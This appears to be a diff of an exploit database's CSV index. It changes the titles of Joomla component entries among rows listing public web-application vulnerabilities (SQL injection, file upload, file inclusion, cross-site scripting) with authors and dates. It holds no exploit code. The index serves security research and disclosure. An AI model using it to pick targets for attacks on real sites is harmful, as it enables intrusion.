36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
|
||||
36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0
|
||||
|
|
@ -34817,15 +34818,15 @@ id,file,description,date,author,platform,type,port
|
|||
36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0
|
||||
36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
|
||||
36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
|
||||
36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
|
||||
36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
|
||||
36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0
|
||||
36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36591,platforms/php/webapps/36591.txt,"Joomla! Component Full - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36592,platforms/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
|
||||
36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
|
||||
36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
|
||||
36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
|
||||
|
|
@ -34844,18 +34845,18 @@ id,file,description,date,author,platform,type,port
|
|||
36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
|
||||
36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
|
||||
36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0
|
||||
36624,platforms/php/webapps/36624.txt,"Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
|
||||
36624,platforms/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
|
||||
36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
|
||||
36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0
|
||||
36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0
|
||||
36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0
|
||||
36629,platforms/php/webapps/36629.txt,"Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
|
||||
36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
|
||||
36630,platforms/php/webapps/36630.txt,"Joomla! Component 'com_products' - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
|
||||
36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0
|
||||
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0
|
||||
36634,platforms/php/webapps/36634.txt,"Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36635,platforms/php/webapps/36635.txt,"Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36638,platforms/php/webapps/36638.txt,"Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
|
||||
36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
|
||||
36639,platforms/php/webapps/36639.txt,"Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0
|
||||
36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
|
||||
|
|
@ -34863,7 +34864,7 @@ id,file,description,date,author,platform,type,port
|
|||
36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
|
||||
36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0
|
||||
36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
|
||||
36646,platforms/php/webapps/36646.txt,"Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0
|
||||
36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
@ -34872,7 +34873,7 @@ id,file,description,date,author,platform,type,port
|
|||
36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
|
||||
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
|
||||
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
|
||||
36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
|
||||
36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
|
||||
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0
|
||||
36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
|
||||
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0
|
||||
|
|
@ -35000,7 +35001,7 @@ id,file,description,date,author,platform,type,port
|
|||
36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
|
||||
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
|
||||
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
|
||||
36863,platforms/php/webapps/36863.txt,"Joomla! Component 'com_machine' - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
|
||||
36863,platforms/php/webapps/36863.txt,"Joomla! Component Machine - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0
|
||||
36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
|
||||
36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",php,webapps,0
|
||||
36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0
|
||||
|
|
@ -35352,12 +35353,12 @@ id,file,description,date,author,platform,type,port
|
|||
37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0
|
||||
37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37374,platforms/php/webapps/37374.txt,"Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0
|
||||
37375,platforms/php/webapps/37375.php,"Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
|
||||
37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0
|
||||
37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0
|
||||
37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37378,platforms/php/webapps/37378.php,"Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37379,platforms/php/webapps/37379.php,"Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37380,platforms/php/webapps/37380.php,"Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37380,platforms/php/webapps/37380.php,"Joomla! Component DentroVideo 1.2 - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37381,platforms/php/webapps/37381.html,"Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37382,platforms/php/webapps/37382.php,"Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0
|
||||
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
|
|
@ -35375,10 +35376,10 @@ id,file,description,date,author,platform,type,port
|
|||
37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0
|
||||
37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0
|
||||
37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0
|
||||
37410,platforms/php/webapps/37410.php,"Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
|
||||
37410,platforms/php/webapps/37410.php,"Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0
|
||||
37411,platforms/php/webapps/37411.txt,"WordPress Plugin ORGanizer - Multiple Vulnerabilities",2012-06-15,MustLive,php,webapps,0
|
||||
37412,platforms/php/webapps/37412.php,"Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
|
||||
37413,platforms/php/webapps/37413.txt,"Joomla! Component 'com_jcalpro' - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
|
||||
37412,platforms/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
|
||||
37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
|
||||
37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0
|
||||
37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
|
|
@ -35457,7 +35458,7 @@ id,file,description,date,author,platform,type,port
|
|||
37514,platforms/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80
|
||||
37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
|
||||
37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
|
||||
37519,platforms/php/webapps/37519.txt,"Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
|
||||
37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0
|
||||
37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0
|
||||
37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0
|
||||
37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0
|
||||
|
|
@ -35470,7 +35471,7 @@ id,file,description,date,author,platform,type,port
|
|||
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
|
||||
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
|
||||
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
|
||||
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
|
||||
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI redirection",2012-07-29,"Aung Khant",php,webapps,0
|
||||
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
|
||||
|
|
@ -35544,7 +35545,7 @@ id,file,description,date,author,platform,type,port
|
|||
37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
|
||||
37645,platforms/php/webapps/37645.txt,"OrderSys 1.6.4 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0
|
||||
37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0
|
||||
37648,platforms/php/webapps/37648.txt,"Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
|
||||
37648,platforms/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0
|
||||
37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0
|
||||
37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0
|
||||
37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0
|
||||
|
|
@ -35712,7 +35713,7 @@ id,file,description,date,author,platform,type,port
|
|||
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
|
||||
38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0
|
||||
38007,platforms/php/webapps/38007.txt,"DCForum - auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0
|
||||
38008,platforms/php/webapps/38008.txt,"Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
|
||||
38008,platforms/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0
|
||||
38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0
|
||||
38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0
|
||||
38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0
|
||||
|
|
@ -36106,7 +36107,7 @@ id,file,description,date,author,platform,type,port
|
|||
38803,platforms/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80
|
||||
38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0
|
||||
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
|
||||
38777,platforms/php/webapps/38777.txt,"Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
|
||||
38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0
|
||||
38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
|
||||
38783,platforms/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0
|
||||
38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0
|
||||
|
|
@ -36120,7 +36121,7 @@ id,file,description,date,author,platform,type,port
|
|||
38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0
|
||||
38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0
|
||||
38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0
|
||||
38814,platforms/php/webapps/38814.php,"Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
|
||||
38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0
|
||||
38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0
|
||||
38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0
|
||||
38820,platforms/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0
|
||||
|
|
@ -36293,7 +36294,7 @@ id,file,description,date,author,platform,type,port
|
|||
39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0
|
||||
39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0
|
||||
39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0
|
||||
39140,platforms/php/webapps/39140.txt,"Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
|
||||
39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0
|
||||
39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0
|
||||
39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
|
||||
39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0
|
||||
|
|
@ -36493,7 +36494,7 @@ id,file,description,date,author,platform,type,port
|
|||
39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80
|
||||
39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80
|
||||
39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80
|
||||
39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
|
||||
39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
|
||||
39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
|
||||
39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
|
||||
39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
|
||||
|
|
@ -36614,7 +36615,7 @@ id,file,description,date,author,platform,type,port
|
|||
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
|
||||
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39936,platforms/php/webapps/39936.txt,"Joomla! Component 'com_payplans' 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
|
||||
39936,platforms/php/webapps/39936.txt,"Joomla! Component com_payplans 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
|
||||
39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80
|
||||
39946,platforms/php/webapps/39946.php,"WordPress Plugin Social Stream 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80
|
||||
39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80
|
||||
|
|
@ -36622,7 +36623,7 @@ id,file,description,date,author,platform,type,port
|
|||
39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
|
||||
39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
|
||||
39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
|
||||
39953,platforms/php/webapps/39953.txt,"Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
|
||||
39953,platforms/php/webapps/39953.txt,"Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
|
||||
